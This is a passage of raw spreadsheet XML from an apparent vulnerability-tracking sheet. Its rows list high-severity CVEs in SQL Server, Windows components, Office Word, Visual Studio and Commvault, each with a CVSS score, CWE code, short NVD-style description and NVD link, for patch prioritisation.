t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t></is></c></row><row r="206"><c r="A206" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B206" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C206" s="5" t="inlineStr"><is><t>CVE-2026-73018</t></is></c><c r="D206" s="5" t="n"><v>8.800000000000001</v></c><c r="E206" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F206" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G206" s="5" t="inlineStr" /><c r="H206" s="5" t="n"><v>0.008</v></c><c r="I206" s="5" t="inlineStr" /><c r="J206" s="5" t="inlineStr" /><c r="K206" s="5" t="inlineStr" /><c r="L206" s="5" t="inlineStr" /><c r="M206" s="5" t="inlineStr" /><c r="N206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O206" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P206" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q206" s="5" t="inlineStr" /><c r="R206" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S206" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t></is></c></row><row r="207"><c r="A207" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B207" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C207" s="5" t="inlineStr"><is><t>CVE-2026-73023</t></is></c><c r="D207" s="5" t="n"><v>8.800000000000001</v></c><c r="E207" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F207" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G207" s="5" t="inlineStr" /><c r="H207" s="5" t="n"><v>0.006</v></c><c r="I207" s="5" t="inlineStr" /><c r="J207" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K20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07" s="5" t="inlineStr" /><c r="M207" s="5" t="inlineStr" /><c r="N207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P207" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q207" s="5" t="inlineStr" /><c r="R207" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S207" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t></is></c></row><row r="208"><c r="A208" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B208" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C208" s="5" t="inlineStr"><is><t>CVE-2026-73028</t></is></c><c r="D208" s="5" t="n"><v>8.800000000000001</v></c><c r="E208" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F208" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G208" s="5" t="inlineStr" /><c r="H208" s="5" t="n"><v>0.005</v></c><c r="I208" s="5" t="inlineStr" /><c r="J208" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K208" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L208" s="5" t="inlineStr" /><c r="M208" s="5" t="inlineStr" /><c r="N208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O208" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P208" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q208" s="5" t="inlineStr" /><c r="R208" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S208" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t></is></c></row><row r="209"><c r="A209" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C209" s="5" t="inlineStr"><is><t>CVE-2026-77105</t></is></c><c r="D209" s="5" t="n"><v>8.800000000000001</v></c><c r="E209" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G209" s="5" t="inlineStr" /><c r="H209" s="5" t="n"><v>0.002</v></c><c r="I209" s="5" t="inlineStr" /><c r="J209" s="5" t="inlineStr" /><c r="K209" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L209" s="5" t="inlineStr" /><c r="M209" s="5" t="inlineStr" /><c r="N209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P209" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q209" s="5" t="inlineStr" /><c r="R209" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S209" s="5" t="inlineStr"><is><t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t></is></c><c r="T209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t></is></c></row><row r="210"><c r="A210" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C210" s="5" t="inlineStr"><is><t>CVE-2026-77106</t></is></c><c r="D210" s="5" t="n"><v>8.800000000000001</v></c><c r="E210" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G210" s="5" t="inlineStr" /><c r="H210" s="5" t="n"><v>0.003</v></c><c r="I210" s="5" t="inlineStr" /><c r="J210" s="5" t="inlineStr" /><c r="K210" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L210" s="5" t="inlineStr" /><c r="M210" s="5" t="inlineStr" /><c r="N210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P210" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q210" s="5" t="inlineStr" /><c r="R210" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S210" s="5" t="inlineStr"><is><t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t></is></c><c r="T210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t></is></c></row><row r="211"><c r="A211" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B211" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C211" s="5" t="inlineStr"><is><t>CVE-2026-77480</t></is></c><c r="D211" s="5" t="n"><v>8.800000000000001</v></c><c r="E211" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F211" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G211" s="5" t="inlineStr" /><c r="H211" s="5" t="n"><v>0.005</v></c><c r="I211" s="5" t="inlineStr" /><c r="J211" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K211" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L211" s="5" t="inlineStr" /><c r="M211" s="5" t="inlineStr" /><c r="N211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O211" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P211" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q211" s="5" t="inlineStr" /><c r="R211" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S211" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t></is></c></row><row r="212"><c r="A212" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C212" s="5" t="inlineStr"><is><t>CVE-2026-77481</t></is></c><c r="D212" s="5" t="n"><v>8.800000000000001</v></c><c r="E212" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F212" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G212" s="5" t="inlineStr" /><c r="H212" s="5" t="n"><v>0.006</v></c><c r="I212" s="5" t="inlineStr" /><c r="J212" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K212" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L212" s="5" t="inlineStr" /><c r="M212" s="5" t="inlineStr" /><c r="N212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P212" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q212" s="5" t="inlineStr" /><c r="R212" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S212" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t></is></c></row><row r="213"><c r="A213" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B213" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C213" s="5" t="inlineStr"><is><t>CVE-2026-77482</t></is></c><c r="D213" s="5" t="n"><v>8.800000000000001</v></c><c r="E213" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F213" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G213" s="5" t="inlineStr" /><c r="H213" s="5" t="n"><v>0.008</v></c><c r="I213" s="5" t="inlineStr" /><c r="J213" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K213" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L213" s="5" t="inlineStr" /><c r="M213" s="5" t="inlineStr" /><c r="N213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O213" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P213" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q213" s="5" t="inlineStr" /><c r="R213" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S213" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t></is></c></row><row r="214"><c r="A214" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B214" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C214" s="5" t="inlineStr"><is><t>CVE-2026-77483</t></is></c><c r="D214" s="5" t="n"><v>8.800000000000001</v></c><c r="E214" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F214" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G214" s="5" t="inlineStr" /><c r="H214" s="5" t="n"><v>0.005</v></c><c r="I214" s="5" t="inlineStr" /><c r="J214" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K214" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L214" s="5" t="inlineStr" /><c r="M214" s="5" t="inlineStr" /><c r="N214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O214" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P214" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q214" s="5" t="inlineStr" /><c r="R214" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S214" s="5" t="inlineStr"><is><t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t></is></c></row><row r="215"><c r="A215" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B215" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C215" s="5" t="inlineStr"><is><t>CVE-2026-77484</t></is></c><c r="D215" s="5" t="n"><v>8.800000000000001</v></c><c r="E215" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F215" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G215" s="5" t="inlineStr" /><c r="H215" s="5" t="n"><v>0.011</v></c><c r="I215" s="5" t="inlineStr" /><c r="J215" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K215" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L215" s="5" t="inlineStr" /><c r="M215" s="5" t="inlineStr" /><c r="N215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O215" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P215" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q215" s="5" t="inlineStr" /><c r="R215" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S215" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t></is></c></row><row r="216"><c r="A216" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C216" s="5" t="inlineStr"><is><t>CVE-2026-77486</t></is></c><c r="D216" s="5" t="n"><v>8.800000000000001</v></c><c r="E216" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F216" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G216" s="5" t="inlineStr" /><c r="H216" s="5" t="n"><v>0.005</v></c><c r="I216" s="5" t="inlineStr" /><c r="J216" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K216" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019</t></is></c><c r="L216" s="5" t="inlineStr" /><c r="M216" s="5" t="inlineStr" /><c r="N216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P216" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q216" s="5" t="inlineStr" /><c r="R216" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S216" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t></is></c></row><row r="217"><c r="A217" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B217" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C217" s="5" t="inlineStr"><is><t>CVE-2026-77487</t></is></c><c r="D217" s="5" t="n"><v>8.800000000000001</v></c><c r="E217" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F217" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G217" s="5" t="inlineStr" /><c r="H217" s="5" t="n"><v>0.005</v></c><c r="I217" s="5" t="inlineStr" /><c r="J217" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K217" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L217" s="5" t="inlineStr" /><c r="M217" s="5" t="inlineStr" /><c r="N217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P217" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q217" s="5" t="inlineStr" /><c r="R217" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S217" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t></is></c></row><row r="218"><c r="A218" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C218" s="5" t="inlineStr"><is><t>CVE-2026-77495</t></is></c><c r="D218" s="5" t="n"><v>8.800000000000001</v></c><c r="E218" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F218" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G218" s="5" t="inlineStr" /><c r="H218" s="5" t="n"><v>0.006</v></c><c r="I218" s="5" t="inlineStr" /><c r="J218" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K21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18" s="5" t="inlineStr" /><c r="M218" s="5" t="inlineStr" /><c r="N218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P218" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q218" s="5" t="inlineStr" /><c r="R218" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S218" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t></is></c></row><row r="219"><c r="A219" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C219" s="5" t="inlineStr"><is><t>CVE-2026-77504</t></is></c><c r="D219" s="5" t="n"><v>8.800000000000001</v></c><c r="E219" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F219" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G219" s="5" t="inlineStr" /><c r="H219" s="5" t="n"><v>0.006</v></c><c r="I219" s="5" t="inlineStr" /><c r="J219" s="5" t="inlineStr" /><c r="K219" s="5" t="inlineStr" /><c r="L219" s="5" t="inlineStr" /><c r="M219" s="5" t="inlineStr" /><c r="N219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P219" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q219" s="5" t="inlineStr" /><c r="R219" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S219" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t></is></c></row><row r="220"><c r="A220" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C220" s="5" t="inlineStr"><is><t>CVE-2026-77901</t></is></c><c r="D220" s="5" t="n"><v>8.800000000000001</v></c><c r="E220" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G220" s="5" t="inlineStr" /><c r="H220" s="5" t="n"><v>0.006</v></c><c r="I220" s="5" t="inlineStr" /><c r="J220" s="5" t="inlineStr" /><c r="K220" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L220" s="5" t="inlineStr" /><c r="M220" s="5" t="inlineStr" /><c r="N220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P220" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q220" s="5" t="inlineStr" /><c r="R220" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S220" s="5" t="inlineStr"><is><t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t></is></c></row><row r="221"><c r="A221" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B221" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C221" s="5" t="inlineStr"><is><t>CVE-2026-77906</t></is></c><c r="D221" s="5" t="n"><v>8.800000000000001</v></c><c r="E221" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F221" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G221" s="5" t="inlineStr" /><c r="H221" s="5" t="n"><v>0.008</v></c><c r="I221" s="5" t="inlineStr" /><c r="J221" s="5" t="inlineStr" /><c r="K221" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L221" s="5" t="inlineStr" /><c r="M221" s="5" t="inlineStr" /><c r="N221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O221" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P221" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q221" s="5" t="inlineStr" /><c r="R221" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S221" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t></is></c></row><row r="222"><c r="A222" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C222" s="5" t="inlineStr"><is><t>CVE-2026-77907</t></is></c><c r="D222" s="5" t="n"><v>8.800000000000001</v></c><c r="E222" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F222" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G222" s="5" t="inlineStr" /><c r="H222" s="5" t="n"><v>0.005</v></c><c r="I222" s="5" t="inlineStr" /><c r="J222" s="5" t="inlineStr" /><c r="K222" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L222" s="5" t="inlineStr" /><c r="M222" s="5" t="inlineStr" /><c r="N222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P222" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q222" s="5" t="inlineStr" /><c r="R222" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S222" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t></is></c></row><row r="223"><c r="A223" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B223" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C223" s="5" t="inlineStr"><is><t>CVE-2026-77908</t></is></c><c r="D223" s="5" t="n"><v>8.800000000000001</v></c><c r="E223" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F223" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G223" s="5" t="inlineStr" /><c r="H223" s="5" t="n"><v>0.007</v></c><c r="I223" s="5" t="inlineStr" /><c r="J223" s="5" t="inlineStr" /><c r="K223" s="5" t="inlineStr" /><c r="L223" s="5" t="inlineStr" /><c r="M223" s="5" t="inlineStr" /><c r="N223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P223" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q223" s="5" t="inlineStr" /><c r="R223" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S223" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="T223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t></is></c></row><row r="224"><c r="A224" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C224" s="5" t="inlineStr"><is><t>CVE-2026-78439</t></is></c><c r="D224" s="5" t="n"><v>8.800000000000001</v></c><c r="E224" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F224" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G224" s="5" t="inlineStr" /><c r="H224" s="5" t="n"><v>0.006</v></c><c r="I224" s="5" t="inlineStr" /><c r="J224" s="5" t="inlineStr" /><c r="K224" s="5" t="inlineStr" /><c r="L224" s="5" t="inlineStr" /><c r="M224" s="5" t="inlineStr" /><c r="N224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P224" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q224" s="5" t="inlineStr" /><c r="R224" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S224" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t></is></c></row><row r="225"><c r="A225" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B225" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C225" s="5" t="inlineStr"><is><t>CVE-2026-78442</t></is></c><c r="D225" s="5" t="n"><v>8.800000000000001</v></c><c r="E225" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F225" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G225" s="5" t="inlineStr" /><c r="H225" s="5" t="n"><v>0.006</v></c><c r="I225" s="5" t="inlineStr" /><c r="J225" s="5" t="inlineStr" /><c r="K225" s="5" t="inlineStr" /><c r="L225" s="5" t="inlineStr" /><c r="M225" s="5" t="inlineStr" /><c r="N225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P225" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q225" s="5" t="inlineStr" /><c r="R225" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S225" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t></is></c></row><row r="226"><c r="A226" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B226" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C226" s="5" t="inlineStr"><is><t>CVE-2026-78456</t></is></c><c r="D226" s="5" t="n"><v>8.800000000000001</v></c><c r="E226" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F226" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G226" s="5" t="inlineStr" /><c r="H226" s="5" t="n"><v>0.008999999999999999</v></c><c r="I226" s="5" t="inlineStr" /><c r="J226" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K226" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022</t></is></c><c r="L226" s="5" t="inlineStr" /><c r="M226" s="5" t="inlineStr" /><c r="N226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P226" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q226" s="5" t="inlineStr" /><c r="R226" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S226" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t></is></c></row><row r="227"><c r="A227" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B227" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C227" s="5" t="inlineStr"><is><t>CVE-2026-78462</t></is></c><c r="D227" s="5" t="n"><v>8.800000000000001</v></c><c r="E227" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F227" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G227" s="5" t="inlineStr" /><c r="H227" s="5" t="n"><v>0.005</v></c><c r="I227" s="5" t="inlineStr" /><c r="J227" s="5" t="inlineStr" /><c r="K227" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L227" s="5" t="inlineStr" /><c r="M227" s="5" t="inlineStr" /><c r="N227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O227" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P227" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q227" 